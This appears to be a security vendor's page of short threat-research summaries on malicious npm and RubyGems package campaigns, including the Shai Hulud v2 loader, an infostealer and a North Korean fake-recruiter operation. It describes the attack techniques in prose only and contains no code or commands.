Shai Hulud v2 campaign: preinstall script (setup_bun.js) and loader (setup_bin.js) that installs/locates Bun and executes an obfuscated bundled malicious script (bun_environment.js) with suppressed output.
Nov 05, 2025
Elves on npm
A surge of auto-generated "elf-stats" npm packages is being published every two minutes from new accounts. These packages contain simple malware variants and are being rapidly removed by npm. At least 420 unique packages have been identified, often described as being generated every two minutes, with some mentioning a capture the flag challenge or test.
Jul 04, 2025
RubyGems Automation-Tool Infostealer
Since at least March 2023, a threat actor using multiple aliases uploaded 60 malicious gems to RubyGems that masquerade as automation tools (Instagram, TikTok, Twitter, Telegram, WordPress, and Naver). The gems display a Korean Glimmer-DSL-LibUI login window, then exfiltrate the entered username/password and the host's MAC address via HTTP POST to threat actor-controlled infrastructure.
Mar 13, 2025
North Korea's Contagious Interview Campaign
Since late 2024, we have tracked hundreds of malicious npm packages and supporting infrastructure tied to North Korea's Contagious Interview operation, with tens of thousands of downloads targeting developers and tech job seekers. The threat actors run a factory-style playbook: recruiter lures and fake coding tests, polished GitHub templates, and typosquatted or deceptive dependencies that install or import into real projects.
Jul 23, 2024
Network Reconnaissance Campaign
A malicious npm supply chain attack that leveraged 60 packages across three disposable npm accounts to fingerprint developer workstations and CI/CD servers during installation. Each package embedded a compact postinstall script that collected hostnames, internal and external IP addresses, DNS resolvers, usernames, home and working directories, and package metadata, then exfiltrated this data as a JSON blob to a hardcoded Discord webhook.
Get our latest security research, open source insights, and product updates.

Security News
npm now links to Socket's security analysis on every package page. Here's what you'll find when you click through.

Security News
A compromised npm publish token was used to push a malicious postinstall script in cline@2.3.0, affecting the popular AI coding agent CLI with 90k weekly downloads.

Product
Socket is now scanning AI agent skills across multiple languages and ecosystems, detecting malicious behavior before developers install, starting with skills.sh's 60,000+ skills.